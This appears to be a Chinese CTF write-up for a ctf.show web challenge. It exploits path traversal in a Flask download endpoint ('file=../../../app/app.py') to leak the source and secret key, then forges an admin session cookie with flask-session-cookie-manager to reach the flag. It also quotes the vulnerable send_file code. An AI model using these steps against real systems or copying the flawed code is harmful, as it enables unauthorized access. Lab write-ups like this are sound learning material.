点击抽老婆页,按f12
发现下载目录:
<a class="layui-btn layui-btn-lg layui-btn-radius layui-btn-normal" href="/download?file=6a3e6e9719438f11020cff3b8fc1c521.jpg" style="width: 200px;">下载老婆</a>
通过把file=后面的内容更改可下载其他内容,可能存在目录穿越漏洞
#听G老师扯扯
http://a104680d-3612-4239-ab53-7801a695120d.challenge.ctf.show/download?file=index.php
尝试下载源码index.php
报错
File "/usr/local/lib/python3.8/site-packages/flask/app.py", line 2548, in __call__
可以根据以上信息,获知:使用的是python的flask框架 #不懂
File "/app/app.py", line 41, in source
def source():
filename=request.args.get('file')
if 'flag' in filename:
return jsonify({"msg":"你想干什么?"})
else:
return send_file('static/img/'+filename,as_attachment=True)
发现 "/app/app.py"路径,还有出题者的调戏msg
http://a104680d-3612-4239-ab53-7801a695120d.challenge.ctf.show/download?file=../../../app/app.py
下载源码 #不懂为什么../../../
其中getwifi()用于设置session,getflag()用于验证session #不懂
flag 的目录是:/secret_path_U_never_know
下载工具flask_session_cookie_manager3.py
https://github.com/noraj/flask-session-cookie-manager
看看说明:
usage: flask_session_cookie_manager{2,3}.py encode [-h] -s <string> -t <string>
optional arguments:
-h, --help show this help message and exit
-s <string>, --secret-key <string>
Secret key
-t <string>, --cookie-structure <string>
Session cookie structure
密钥根据app.py里:app.config['SECRET_KEY'] = 'tanji_is_A_boy_Yooooooooooooooooooooo!'
到flask_session_cookie_manager文件夹里,右键在终端打开,输入:
python flask_session_cookie_manager3.py encode -s 'tanji_is_A_boy_Yooooooooooooooooooooo!' -t "{'isadmin':True}"
输出session: blablabla呵呵哒
访问/secret_path_U_never_know
http://02072b25-a490-4518-8121-63b910172f60.challenge.ctf.show/secret_path_U_never_know
怎么改session。。。
下载editthiscookie
https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg
另外解密session可以用:python flask_session_cookie_manager3.py decode -c ‘session值’
python flask_session_cookie_manager3.py decode -c 'eyJjdXJyZW50X3dpZmkiOiI2NGVkZjQ1ZWQxMzNmMzg4ZjcyNGMyNjZiMDc2NmQ1Zi5qcGciLCJpc2FkbWluIjpmYWxzZX0.ZF3tAg.REUSCpUorJZYYIT8f4Wg8xTOWIQ'
b'{"current_wifi":"64edf45ed133f388f724c266b0766d5f.jpg","isadmin":false}'
发现确实和当前下载的老婆64edf45ed133f388f724c266b0766d5f.jpg一样